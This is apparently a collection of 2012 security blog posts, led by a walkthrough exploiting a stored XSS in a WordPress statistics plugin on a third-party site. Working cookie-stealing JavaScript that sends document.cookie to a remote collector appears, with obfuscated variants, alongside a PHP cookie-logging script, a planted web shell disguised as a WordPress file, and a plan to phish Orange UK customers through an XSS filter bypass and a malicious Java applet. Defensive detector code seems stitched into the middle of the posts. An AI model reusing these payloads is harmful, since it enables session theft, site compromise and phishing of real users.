<a href="http://3.bp.blogspot.com/-tUe_cG2ygIY/UHM3CQvHlMI/AAAAAAAAAQE/2VoWhdtAkGI/s1600/counterperday_folder_content.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="387" src="http://3.bp.blogspot.com/-tUe_cG2ygIY/UHM3CQvHlMI/AAAAAAAAAQE/2VoWhdtAkGI/s640/counterperday_folder_content.jpg" width="640" /></a></div>
<br />
After opening readme.txt and seeing that the current version is 3.2.3, we can focus on the previous exploit found in exploit-db. This version is vulnerable to a <a href="http://www.exploit-db.com/exploits/20862/">stored XSS</a>.<br />
<br />
How does this vulnerability work? As you can see from the picture below, there is a file notes.php which allows everyone to add notes.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/--e5y9OVDZn8/UHrt984GN-I/AAAAAAAAARY/SvCWnPYs31g/s1600/wp_clean_notes.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/--e5y9OVDZn8/UHrt984GN-I/AAAAAAAAARY/SvCWnPYs31g/s1600/wp_clean_notes.jpg" /></a></div>
<br />
This note can be plain text or HTML.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-nR7f_c6PceQ/UJOfu7DustI/AAAAAAAAAT4/GgWSZYeaK-4/s1600/cpd_html_code.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-nR7f_c6PceQ/UJOfu7DustI/AAAAAAAAAT4/GgWSZYeaK-4/s1600/cpd_html_code.jpg" /></a></div>
<br />
This code is rendered in the Count per Day dashboard and the developer didn't validate the input, but the main problem with this page is that it shouldn't be accessible to everyone.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-crnrvKiJ3aE/UJOgt5gpGbI/AAAAAAAAAUA/k77YQv76nBo/s1600/cpd_dashboard.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-crnrvKiJ3aE/UJOgt5gpGbI/AAAAAAAAAUA/k77YQv76nBo/s1600/cpd_dashboard.jpg" /></a></div>
<br />
This is a perfect scenario for a cookie grabber, because the code is executed only in the administrator panel.<br />
<br /></div>
<div>
How can we get the admin cookie? </div>
<div>
<br />
We need two things:</div>
<div>
<ol>
<li>JavaScript code that gets the cookie through <b>document.cookie</b> and sends it</li>
<li>A script (PHP, Python, Ruby ..) on another server that receives the information and stores it (file, MySQL, sends an email...).</li>
</ol>
<div>
A lot of online examples use a redirection method to get the cookie, like this one:</div>
<div>
<pre class="brush: js">document.location = "http://scriptlocation.dot/script?c=" + document.cookie
</pre>
</div>
<div>
In this case this is not acceptable, because we want to do it in the stealthiest way. What we have to do is a GET request to a script, so how can we do it in JavaScript without a redirection?</div>
<div>
A clever way is to use the <a href="http://www.w3schools.com/jsref/dom_obj_image.asp">Image object</a> and its <b><a href="http://www.w3schools.com/jsref/prop_img_src.asp">src</a></b> property. Once done, the code will look like this:</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-qxWCEIdntDA/UG_v0gQmXLI/AAAAAAAAAPk/Fn1MRGQBwnA/s1600/xss_cookie_grabber.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-qxWCEIdntDA/UG_v0gQmXLI/AAAAAAAAAPk/Fn1MRGQBwnA/s1600/xss_cookie_grabber.jpg" /></a></div>
If we add this code as a note, nothing will happen, because Count per Day escapes quotes.<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-gTy_BYErcZ4/UG_xFIzdN2I/AAAAAAAAAPs/srxM5ZF3_6Y/s1600/xss_cookie_grabber_not_working.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-gTy_BYErcZ4/UG_xFIzdN2I/AAAAAAAAAPs/srxM5ZF3_6Y/s1600/xss_cookie_grabber_not_working.jpg" /></a></div>
<br />
Since only quotes are escaped, we can bypass this filter in two ways:<br />
<ol>
<li>Convert the URL into Unicode character codes</li>
<li>Use non-alphanumeric JavaScript</li>
</ol>
<div>
Let's try both ways. For the first way we need an ASCII to Unicode converter; I found this site <a href="https://www.martineve.com/2007/05/23/string-fromcharcode-encoder/">string-fromcharcode-encoder</a>. After conversion our code will look like this:<br />
<br />
<pre class="brush: js">new Image().src = String.fromCharCode(104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,50,46,51,47,102,111,108,100,101,114,47,103,114,97,98,98,101,114,46,112,104,112,63,99,61) + document.cookie;
</pre>
<br />
Now the code will be executed, because there are no quotes. A negative aspect of this is that if the administrator checks the source code of the page, he will see the string <b>document.cookie</b> and maybe he will suspect something.<br />
<br />
In the second way we transform the JavaScript code into an equivalent sequence of () [] {} ! + characters. A guy named Patricio Palladino made it possible by creating a tool available <a href="http://patriciopalladino.com/files/hieroglyphy/">here</a>. Now our cookie grabber will look like this:<br />
<pre class="brush: js">[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]](([]
-- snip --
</pre>
Following this way we obfuscate all the code, but the length is a disadvantage for stealthier code. As a last thing we need to use the JavaScript escape function, otherwise some cookie characters will be altered; for example, instead of <b>%</b> we get <b>|</b>.<br />
<pre class="brush: js">new Image().src="http://192.168.2.3/folder/grabber.php?c=" + escape(document.cookie);</pre>
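Both tricks above only hide the grabber from a quick look at the note; a reviewer-side check, added here as an example and not part of the original post, undoes them: it decodes String.fromCharCode(...) sequences and measures how much of a script is made of the hieroglyphy alphabet, so a stored note can be flagged before it renders in the admin dashboard. Function names and the sample notes are constructed for this example; the fromCharCode list is the one from the post.<br />

```javascript
// Added example (not from the original post): reviewer-side deobfuscation of
// the two quote-free encodings. Names and sample notes are constructed here.

// Replace every String.fromCharCode(...) call with the string it builds.
function decodeFromCharCode(source) {
  return source.replace(/String\.fromCharCode\(([\d\s,]*)\)/g, (_, list) => {
    const codes = list.split(",").map(s => s.trim()).filter(s => s.length > 0);
    return String.fromCharCode(...codes.map(Number));
  });
}

// Share of non-whitespace characters taken from the hieroglyphy alphabet []()!+{}.
function symbolRatio(source) {
  const chars = source.replace(/\s+/g, "");
  if (chars.length === 0) return 0;
  return chars.replace(/[^\[\]()!+{}]/g, "").length / chars.length;
}

// Pull the JavaScript out of <script> blocks and inline on* handlers
// (handlers may be separated by "/" instead of a space, as in <img/src=.../onerror=...).
function extractScripts(html) {
  const scripts = [];
  const scriptRe = /<script[^>]*>([\s\S]*?)<\/script>/gi;
  const handlerRe = /[\s\/]on[a-z]+\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) scripts.push(m[1]);
  while ((m = handlerRe.exec(html)) !== null) scripts.push(m[1] ?? m[2] ?? m[3]);
  return scripts;
}

// Inspect one stored note and return human-readable findings, in this order:
// cookie access, contacted URL, Image.src channel, hieroglyphy-style script.
function inspectNote(html) {
  const findings = [];
  for (const raw of extractScripts(html)) {
    const decoded = decodeFromCharCode(raw);
    if (/document\.cookie/.test(decoded)) findings.push("reads document.cookie");
    const url = decoded.match(/https?:\/\/[^\s"'+)]+/);
    if (url) findings.push("contacts " + url[0]);
    if (/new\s+Image\s*\(|\.src\s*=/.test(decoded)) findings.push("uses Image.src as a request channel");
    if (symbolRatio(raw) > 0.9) findings.push("non-alphanumeric (hieroglyphy-style) script");
  }
  return findings;
}

// Constructed sample notes: a harmless one, the fromCharCode variant from the
// post, and a short hieroglyphy expression (it evaluates to "sort"; only the
// character mix matters for the ratio check).
const SAMPLE_NOTES = {
  plain: "<p>Visitors today: 42</p>",
  encoded: "<script>new Image().src = String.fromCharCode(104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,50,46,51,47,102,111,108,100,101,114,47,103,114,97,98,98,101,114,46,112,104,112,63,99,61) + document.cookie;</script>",
  hieroglyphy: "<script>(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]</script>",
};

for (const [name, note] of Object.entries(SAMPLE_NOTES)) {
  console.log(name + ": " + (inspectNote(note).join("; ") || "nothing suspicious"));
}
```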
<br />
Till now we have explained how to get the cookie; now let's talk about how to store our information. This task is very simple, because with a few lines of PHP we can store all incoming cookies in a text file.<br />
<br />
Script code:</div>
<br />
<pre class="brush: php"><?php
$file_name = "cookie.txt";
$suicide_key = "password";

if (isset($_GET['c'])) {
    // one cookie name=value pair per line, between START/END markers
    $content = str_replace(" ", "", $_GET['c']);
    $lines = explode(";", $content);
    $handle = fopen($file_name, 'a');
    fwrite($handle, "----- START\n\n");
    foreach ($lines as $line) {
        fwrite($handle, $line . "\n");
    }
    fwrite($handle, "\n----- END\n");
    fclose($handle);
} else if (isset($_GET['s'])) {
    // suicide mode: the right key deletes the log and the script itself
    if (strcmp(trim($_GET['s']), $suicide_key) == 0) {
        unlink($file_name);
        unlink(__FILE__);
    }
} </pre>
This code is simple and doesn't need explanations; the only thing is that I also provided a suicide mode, in case the attacker wants to delete both files. Once we have the administrator cookie we use <a href="https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/">Cookies Manager+</a>, a plugin for Firefox that is able to add/remove cookies.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-_r2zZl4kl48/UHrwErWUeyI/AAAAAAAAARg/-JLB72QvRsg/s1600/wp_add_cookie.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-_r2zZl4kl48/UHrwErWUeyI/AAAAAAAAARg/-JLB72QvRsg/s1600/wp_add_cookie.jpg" /></a></div>
<br />
<br />
After adding our cookie, reload the page and voilà: administrator privileges acquired. Since the cookie can change, or Count per Day can be removed or updated, we need to find a way to create a backdoor (stay persistent). It's here that weevely comes in handy:<br />
<blockquote class="tr_bq">
<i>Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.</i></blockquote>
Fortunately franksite.dot has a plugin installed to manage files, so as administrators we can upload weevely and connect to it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-hG44y_YUF1A/UHrw-S495xI/AAAAAAAAARo/IjSI6WBQbi0/s1600/wp_weevely_connection.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-hG44y_YUF1A/UHrw-S495xI/AAAAAAAAARo/IjSI6WBQbi0/s1600/wp_weevely_connection.jpg" /></a></div>
<br />
To be stealthier we upload weevely again, but this time in another folder (wp-admin) and with a name that looks like a legit WordPress file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-N_ShYJuuoTo/UHrx3u72d0I/AAAAAAAAARw/6oqjezd53w0/s1600/wp_weevely_userfile.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-N_ShYJuuoTo/UHrx3u72d0I/AAAAAAAAARw/6oqjezd53w0/s1600/wp_weevely_userfile.jpg" /></a></div>
<br />
That's all for now. Enjoy the video.<br />
<br />
<iframe allowfullscreen="allowfullscreen" frameborder="0" height="360" src="http://www.youtube.com/embed/JrwlislvE1U" width="640"></iframe><br />
<br />
References:<br />
- <a href="http://www.offensive-security.com/offsec/sample-penetration-test-report/">Sample penetration test report</a><br />
- <a href="https://www.martineve.com/2007/05/23/string-fromcharcode-encoder/">https://www.martineve.com/2007/05/23/string-fromcharcode-encoder/</a><br />
- <a href="http://patriciopalladino.com/blog/2012/08/09/non-alphanumeric-javascript.html">Javascript alphanumeric obfuscator</a></div>
<b>Google winning award email scam</b><br />
Posted by Security Obscurity on 2012-10-02.<br />
<br />
Just a quick post, because I've never seen this type of scam (using Google as the vector), but I think it's an old technique.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-nZJmopHPGQ8/UGtWe_deRNI/AAAAAAAAAO0/RUWdBU92eKs/s1600/google_scam_email.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="http://4.bp.blogspot.com/-nZJmopHPGQ8/UGtWe_deRNI/AAAAAAAAAO0/RUWdBU92eKs/s640/google_scam_email.jpg" width="640" /></a></div>
<br />
I have won a cash prize from Google, but why did Gmail move the email to the spam section? :(<br />
<br />
Attached PDF.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-v_86rLbNhiQ/UGtaDI_uNYI/AAAAAAAAAPM/yVkM6PSRM5Y/s1600/google_scam_pdf.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://1.bp.blogspot.com/-v_86rLbNhiQ/UGtaDI_uNYI/AAAAAAAAAPM/yVkM6PSRM5Y/s640/google_scam_pdf.jpg" width="528" /></a></div>
<br />
The graphics seem to have been created with Paint, because they are horrible. If they have to convince people to send their credentials, at least make a better template.<br />
<br />
<b>From XSS to NT AUTHORITY</b><br />
Posted by Security Obscurity on 2012-05-30.<br />
<br />
A lot of times I have seen Cross-site scripting vulnerabilities classified as low impact or not significant. So this time I want to show you how an attacker can get administrative privileges through a simple XSS.<br />
<br />
A couple of months ago I discovered an XSS vulnerability affecting the UK website of Orange, <a href="http://www.orange.co.uk/">http://www.orange.co.uk</a>. I emailed them a month ago (and again two weeks ago) regarding this vulnerability, but I haven't received any response yet.<br />
<br />
From Wikipedia:<br />
<blockquote class="tr_bq">
<i>Orange is the flagship brand of the France Telecom group for mobile, landline and Internet businesses, with 226 million customers as of December 2011 and, under the brand Orange Business Services, is one of the world.</i></blockquote>
<b>How I found this XSS?</b><br />
<br />
When you read an article, for example this one <a href="http://web.orange.co.uk/article/news/obesity_levels_could_be_cut_with_20_fat_tax">obesity_levels_could_be_cut_with_20_fat_tax</a>, you can see the users' comments at the bottom of the page. If a user wants to leave a comment, he must log in via Google, Facebook, etc. Once logged in, the website creates a profile with all your statistics (recent comments) and personal information (age, gender, joined).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-HaskSd5X5PI/T7VLB2_eDKI/AAAAAAAAAMg/vU16qwq6S7w/s1600/comments_list.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="476" src="http://1.bp.blogspot.com/-HaskSd5X5PI/T7VLB2_eDKI/AAAAAAAAAMg/vU16qwq6S7w/s640/comments_list.JPG" width="640" /></a></div>
<br />
If you click on the name of a user you will be redirected to his profile page, like the one below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-12PLJOAtJOQ/T7VK6Un2BVI/AAAAAAAAAMY/Ebu_3S_lTMM/s1600/orange_user_profile.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="458" src="http://3.bp.blogspot.com/-12PLJOAtJOQ/T7VK6Un2BVI/AAAAAAAAAMY/Ebu_3S_lTMM/s640/orange_user_profile.JPG" width="640" /></a></div>
<br />
If you take a look at the URL you will see that it has three parameters:<br />
<ol>
<li>UID</li>
<li>plckUserId </li>
<li>plckPersonaPage </li>
</ol>
Let's start testing the first parameter. We type some special characters that are used to find potential XSS vulnerabilities like <b>)("><'/&\.</b><br />
<br />
hxxp://web.orange.co.uk/r/community/persona?UID=)("><'/&\<br />
<br />
Surprisingly we get this<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-RgjU5w_9sII/T7VOoiskN2I/AAAAAAAAAMs/I7Wwqjrh8zk/s1600/orange_special_chars.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="324" src="http://1.bp.blogspot.com/-RgjU5w_9sII/T7VOoiskN2I/AAAAAAAAAMs/I7Wwqjrh8zk/s640/orange_special_chars.JPG" width="640" /></a></div>
<br />
Oh... we are lucky; at the first attempt we have obtained something interesting. Let's try with a bit of HTML code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/--7ZFrM3fidw/T7VPum_EwjI/AAAAAAAAAM0/lr0PIgQ0BPU/s1600/orange_h1_tag.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="398" src="http://4.bp.blogspot.com/--7ZFrM3fidw/T7VPum_EwjI/AAAAAAAAAM0/lr0PIgQ0BPU/s640/orange_h1_tag.JPG" width="640" /></a></div>
<br />
As expected, the page didn't sanitize the output and interpreted the HTML code. Using Firebug we can see in which part of the page the faulty parameter is located.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-fh9CktWXxcE/T7Vm6qeGLsI/AAAAAAAAANI/Xh9JEALyDC0/s1600/orange_firebug.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-fh9CktWXxcE/T7Vm6qeGLsI/AAAAAAAAANI/Xh9JEALyDC0/s1600/orange_firebug.JPG" /></a></div>
<br />
Now we substitute the h1 tag with a script tag (<script>alert(0)</script>) and we should get an alert box.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-o16NAY3YOIM/T78ukYjrpwI/AAAAAAAAANY/z5FTVMrg0ks/s1600/orange_script_tag.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="http://1.bp.blogspot.com/-o16NAY3YOIM/T78ukYjrpwI/AAAAAAAAANY/z5FTVMrg0ks/s640/orange_script_tag.JPG" width="640" /></a></div>
<br />
It is not so; let's take a look at the source code.<br />
<br />
<a href="http://1.bp.blogspot.com/-1eC-cKealHU/T78v94WlSqI/AAAAAAAAANo/O0znlqur7yk/s1600/orange_xss_filter.JPG" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://1.bp.blogspot.com/-1eC-cKealHU/T78v94WlSqI/AAAAAAAAANo/O0znlqur7yk/s1600/orange_xss_filter.JPG" /></a><br />
<br />
It seems there is an XSS filter with some blacklisted tags. There are tons of other ways to trigger an XSS without a script tag; one of them is using the img tag.<br />
<br />
<img/src="1"/onerror="alert(1)"<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-tRP_hUgLEQc/T7-AWbWsycI/AAAAAAAAAN0/kMahQ6XOFEw/s1600/orange_img_xss.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://1.bp.blogspot.com/-tRP_hUgLEQc/T7-AWbWsycI/AAAAAAAAAN0/kMahQ6XOFEw/s640/orange_img_xss.JPG" width="640" /></a></div>
<br />
Since 1 isn't a valid image, the onerror event is triggered and its content executed. Now all we have to do is substitute the alert instruction with some useful code.<br />
<br />
In our case we want to redirect the victim to a cloned page containing a malicious Java applet, so the code will be:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-ry7S6oEQVgU/T8XgJs9wRaI/AAAAAAAAAOM/aS5IrHpOV34/s1600/orange_xss_code.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="54" src="http://4.bp.blogspot.com/-ry7S6oEQVgU/T8XgJs9wRaI/AAAAAAAAAOM/aS5IrHpOV34/s640/orange_xss_code.JPG" width="640" /></a></div>
<br />
<br />
<b>How can we trick the victim into clicking our malicious link?</b><br />
<br />
Simple: we can send him an email regarding some promotions that Orange actually runs, telling him to click on the image.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-OnfAWBohsLI/T8SAaugKHaI/AAAAAAAAAOA/ndTYd4LnBQ4/s1600/orange_email_template.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="315" src="http://4.bp.blogspot.com/-OnfAWBohsLI/T8SAaugKHaI/AAAAAAAAAOA/ndTYd4LnBQ4/s400/orange_email_template.JPG" width="400" /></a></div>
<br />
But here we have a little problem.<br />
<br />
When you place the mouse over the image, in most browsers the link the image points to will appear at the bottom. Some users can become suspicious on seeing a link like hxxp://web.orange.co.uk/r/community/persona?UID="><img/src="1"/onerror="window.location='...'", so disguising the URL is a necessary step.<br />
<br />
To accomplish this task we do two things:<br />
<br />
<ol>
<li>Add non-existent URL parameters ( page=1&category=2&ticket=24234&session_id=888 )</li>
<li>XSS character encoding ( <b>UID="><img</b> ... to <b>%55%49%44=%22%3E%3C%69%6D%67</b>.... )</li>
</ol>
<br />
And the result is this.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-TU8zHDB-ksM/T8YnLPx0ucI/AAAAAAAAAOY/JM2g-wH1R9w/s1600/orange_url_covered.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="http://3.bp.blogspot.com/-TU8zHDB-ksM/T8YnLPx0ucI/AAAAAAAAAOY/JM2g-wH1R9w/s640/orange_url_covered.JPG" width="640" /></a></div>
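The disguise only works on a human glancing at the status bar. As an added example (not part of the original post), this is how the same link looks once a log reviewer or a WAF normalises it: parameter names and values are percent-decoded to a fixed point, so double encoding does not help either, and every parameter whose decoded value carries a tag or an on* handler is flagged, decoy parameters or not. The host, path, function names and sample URL are constructed.<br />

```javascript
// Added example (not from the original post): normalising a disguised link the
// way a log reviewer or WAF would. Host, path and sample values are constructed.

// Decode %XX sequences until the string stops changing (handles double
// encoding). A malformed sequence such as a trailing "%" is left as-is
// instead of throwing.
function fullyDecode(s) {
  let prev;
  do {
    prev = s;
    try { s = decodeURIComponent(s); } catch (e) { break; }
  } while (s !== prev);
  return s;
}

// Markup- or script-bearing values: a tag start, an on* event handler
// attribute or a javascript: URL. The compact <img/src=.../onerror=...
// syntax is covered because "/" is a word boundary before "onerror".
const MARKUP_RE = /<\s*\/?[a-z]|\bon[a-z]+\s*=|javascript:/i;

// Split the query string, decode every name and value, and report the
// parameters whose decoded name or value carries markup.
function analyzeRequestUrl(url) {
  const query = url.includes("?") ? url.slice(url.indexOf("?") + 1) : "";
  const decoded = {};
  const flagged = [];
  for (const pair of query.split("&")) {
    if (!pair) continue;
    const eq = pair.indexOf("=");
    const name = fullyDecode(eq === -1 ? pair : pair.slice(0, eq));
    const value = eq === -1 ? "" : fullyDecode(pair.slice(eq + 1));
    decoded[name] = value;
    if (MARKUP_RE.test(value) || MARKUP_RE.test(name)) flagged.push(name);
  }
  return { decoded, flagged };
}

// Encode every character as %XX (ASCII input only), the way the post turns
// UID="><img into %55%49%44=%22%3E%3C%69%6D%67...
function percentEncodeAll(s) {
  return Array.from(s, c =>
    "%" + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0")).join("");
}

// Constructed sample: the decoy parameters first, then the fully encoded
// parameter name carrying the img/onerror payload quoted in the post.
const PAYLOAD = '"><img/src="1"/onerror="alert(1)"';
const SAMPLE_URL = "http://example.com/persona?page=1&category=2&ticket=24234&session_id=888&"
  + percentEncodeAll("UID") + "=" + percentEncodeAll(PAYLOAD);

const report = analyzeRequestUrl(SAMPLE_URL);
console.log("flagged parameters:", report.flagged);
for (const name of report.flagged) console.log(name + " = " + report.decoded[name]);
```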
<br />
To compromise the victim's machine we use a great feature of SET called the Java Applet Attack Vector.<br />
<br />
From <a href="http://www.social-engineer.org/">http://www.social-engineer.org</a>:<br />
<blockquote class="tr_bq">
<i>The Java Applet is one of the core attack vectors within SET and the highest success rate for compromise. The Java Applet attack will create a malicious Java Applet that once run will completely compromise the victim. The neat trick with SET is that you can completely clone a website and once the victim has clicked run, it will redirect the victim back to the original site making the attack much more believable.</i></blockquote>
I've cloned this page <a href="http://web.orange.co.uk/p/film/cinema_tickets">hxxp://web.orange.co.uk/p/film/cinema_tickets</a> and sent the email from an address that a lot of companies use when they send promotions and things like that (donotreply@...).<br />
<br />
That's all, enjoy the video.<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/x5DxA3w6bmM" width="640"></iframe><br />
<br />
<b>CartaSi phishing email part 2/2</b><br />
Posted by Security Obscurity on 2012-04-23.<br />
<br />
Are there several people behind these phishing emails, or just one guy?<br />
<br />
What I think is that there is only one guy, because if you check the title of this script you see the words <b>assembled by ME</b>; if it was a team it should say Assembled by XYZ team.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-t2nvyn2CPjY/T4hGVJ1v6gI/AAAAAAAAAIU/0n9STwpcLSQ/s1600/assembled_by_me.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://3.bp.blogspot.com/-t2nvyn2CPjY/T4hGVJ1v6gI/AAAAAAAAAIU/0n9STwpcLSQ/s400/assembled_by_me.JPG" width="369" /></a></div>
<br />
Where is he from?<br />
<br />
His mother tongue is Romanian and I think he lives in Italy. As you can see below there are several files written in Romanian, and the stolen information is sent to a Fastweb email address, which you cannot create if you don't live in Italy.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-zZw2OhA9aWE/T4k91tfprCI/AAAAAAAAAJc/qkl7bcjT1Ng/s1600/romanian_write.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-zZw2OhA9aWE/T4k91tfprCI/AAAAAAAAAJc/qkl7bcjT1Ng/s1600/romanian_write.JPG" /></a></div>
I was wrong in the previous article saying that the phisher hacked the website, because it was defaced by FERID23 from anti-armenia.org. I suppose that at the end of September 2011 this phisher found it, uploaded a shell and created several folders in this order:<br />
<ol>
<li><b>d3b</b> (postepay information stealer)</li>
<li><b>stf</b> (cartasi, uk paypal, banca intesa, it paypal, postepay, VISA)</li>
<li><b>pastote</b> (cartasi, paypal, VISA, bancopostaclick)</li>
</ol>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-RLBaTnVaVTU/T4hr-wEHptI/AAAAAAAAAJU/lnZeSrDZ-b4/s1600/hacked_by.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="382" src="http://3.bp.blogspot.com/-RLBaTnVaVTU/T4hr-wEHptI/AAAAAAAAAJU/lnZeSrDZ-b4/s640/hacked_by.JPG" width="640" /></a></div>
<br />
Taking a look at the pastote folder, we see that he uses a mass mailer script to send phishing emails.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-D1SZJDt3S08/T4c5GlFQ_AI/AAAAAAAAAIE/Ci4R8iWZMRA/s1600/mass_mailer.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="372" src="http://1.bp.blogspot.com/-D1SZJDt3S08/T4c5GlFQ_AI/AAAAAAAAAIE/Ci4R8iWZMRA/s640/mass_mailer.JPG" width="640" /></a></div>
<br />
The email addresses are stored in 30 rar files named pastoteXX.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-Du1pJpauAVY/T4hoIvE9-AI/AAAAAAAAAJM/_EuGhphvm1E/s1600/list_emails.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="524" src="http://2.bp.blogspot.com/-Du1pJpauAVY/T4hoIvE9-AI/AAAAAAAAAJM/_EuGhphvm1E/s640/list_emails.JPG" width="640" /></a></div>
<br />
From 2/3/2012 he started targeting PayPal users, but using a different method. I don't have any PayPal phishing email, but from what there is on this site I can guess that he sends an email saying you have received a bonus of 100 euro and that, in order to proceed, you must log in to your PayPal account (fake link provided) and fill in the form.<br />
<br />
When a victim clicks on the link he will be redirected to this fake page on this site.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Y74USGYquAc/T4heQhumrQI/AAAAAAAAAIc/2yUQP08tkM8/s1600/paypal_fake.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="http://4.bp.blogspot.com/-Y74USGYquAc/T4heQhumrQI/AAAAAAAAAIc/2yUQP08tkM8/s640/paypal_fake.JPG" width="640" /></a></div>
<br />
Once logged in<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-I9cOQl8Aiyc/T4hkm2q0acI/AAAAAAAAAI8/lLvKYTjs9Pk/s1600/paypal_loading.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://2.bp.blogspot.com/-I9cOQl8Aiyc/T4hkm2q0acI/AAAAAAAAAI8/lLvKYTjs9Pk/s640/paypal_loading.JPG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
